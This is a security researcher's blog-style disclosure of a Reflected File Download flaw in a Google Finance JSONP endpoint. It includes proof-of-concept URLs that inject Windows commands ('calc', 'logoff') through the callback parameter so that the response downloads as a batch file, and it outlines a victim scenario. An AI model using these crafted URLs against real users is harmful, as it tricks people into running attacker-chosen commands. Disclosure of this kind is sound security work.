Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.
When I noticed this request:
[code lang=”html”]http://www.google.com/finance/info?q=ELI:ALTR&callback=?[/code]
Which returned the following information:
[code lang=”html”]
// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
[/code]
I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:
[code lang=”html”]http://www.google.com/finance/info?q=ELI:ALTR&callback=calc[/code]
Which returned the following information:
[code lang=”html”]
//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);
[/code]
Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:
[code lang=”html”]http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc[/code]
Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.
I tried successfully with the following browsers:
- Firefox latest version
- Opera latest version
- Internet Explorer 8 and 9
What are the limitations?
I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.
Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logoffs the authenticated user]
Possible attack scenario:
- Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
- Victim downloads the file and execute it.
- After execution of the batch file it will logoff the victim from the operating system.
I made a small video that illustrates my proof-of-concept:
Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.